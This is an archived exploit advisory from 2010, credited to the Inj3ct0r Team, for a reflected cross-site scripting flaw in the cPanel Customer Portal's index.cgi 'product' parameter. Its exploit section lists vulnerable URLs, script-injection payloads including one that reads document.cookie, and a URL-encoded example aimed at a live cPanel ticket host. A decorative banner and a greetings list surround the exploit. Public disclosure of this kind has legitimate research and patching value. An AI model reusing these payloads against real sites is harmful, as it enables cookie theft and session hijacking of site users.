Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24650
HistorySep 02, 2010 - 12:00 a.m.

cPanel Customer Portal (index.cgi) Xss Vulnerability

2010-09-0200:00:00
vulners.com
27

====================================================
cPanel Customer Portal (index.cgi) Xss Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: Inj3ct0r Team

[+] 1-9-2010

[+] Version: 2007-2008

[+] Download:http://www.cpanel.net/


-=[ exploit ]=-

http://localhost.cpanel.net/submit/index.cgi?step=&amp;reqtype=sales&amp;product= [ XSS ]

http://127.0.0.1.cpanel.net/submit/index.cgi?step=&amp;reqtype=sales&amp;product= [ XSS ]

"><script>alert("Inj3ct0r")</script>

"><script>alert(document.cookie)</script>


-=[ Example ]=-

https://tickets.cpanel.net/submit/index.cgi?step=&amp;reqtype=sales&amp;product=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;&#37;22inj3ct0r&#37;22&#41;&#37;3C/script&#37;3E

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
================== Greetz ==================================================
SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ; Sn!pEr.S!Te

Inj3ct0r.com [2010-09-01]